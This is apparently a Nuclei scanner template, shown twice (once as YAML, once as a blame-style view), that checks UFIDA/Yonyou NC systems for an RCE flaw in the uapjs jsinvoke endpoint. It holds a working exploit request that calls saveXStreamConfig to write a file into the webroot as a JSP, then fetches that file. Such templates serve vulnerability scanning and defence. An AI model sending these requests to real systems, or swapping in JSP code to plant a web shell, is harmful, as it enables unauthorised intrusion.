nuclei-templates/http/cnvd/2023/CNVD-C-2023-76801.yaml

id: CNVD-C-2023-76801

info:
  name: UFIDA NC uapjs - RCE vulnerability
  author: SleepingBag945
  severity: critical
  description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
  metadata:
    max-request: 2
  tags: cnvd,cnvd2023,yonyou,rce,intrusive

http:
  - raw:
      - |
        POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
        "parameterTypes":["java.lang.Object","java.lang.String"],
        "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
      - |
        GET /{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200
          - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
        condition: and

# digest: 4b0a00483046022100998225dae1eaa205075155ab10edbd8b2dbae58d976e5d4415f662ccd76ec102022100dafe4c8d3a42c6210d8e7847658fa39c5828b806052a30c28d09e00669e864bb:922c64590222798bb761d5b6d8e72950
updated-templates-p 2023-09-17 08:51:38 +00:00			`id: CNVD-C-2023-76801`
Added some Templates 2023-08-18 03:22:06 +00:00
			`info:`
updated-templates-p 2023-09-17 08:51:38 +00:00			`name: UFIDA NC uapjs - RCE vulnerability`
Added some Templates 2023-08-18 03:22:06 +00:00			`author: SleepingBag945`
			`severity: critical`
updated-templates-p 2023-09-17 08:51:38 +00:00			`description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.`
TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023] :robot: 2023-09-18 12:45:28 +00:00			`metadata:`
			`max-request: 2`
templateman update 2023-10-14 11:27:55 +00:00			`tags: cnvd,cnvd2023,yonyou,rce,intrusive`
Added some Templates 2023-08-18 03:22:06 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /uapjs/jsinvoke/?action=invoke HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded;charset=UTF-8`

			`{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",`
			`"parameterTypes":["java.lang.Object","java.lang.String"],`
			`"parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}`
			`- \|`
			`GET /{{randstr_1}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code_1 == 200`
			`- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")`
			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100998225dae1eaa205075155ab10edbd8b2dbae58d976e5d4415f662ccd76ec102022100dafe4c8d3a42c6210d8e7847658fa39c5828b806052a30c28d09e00669e864bb:922c64590222798bb761d5b6d8e72950`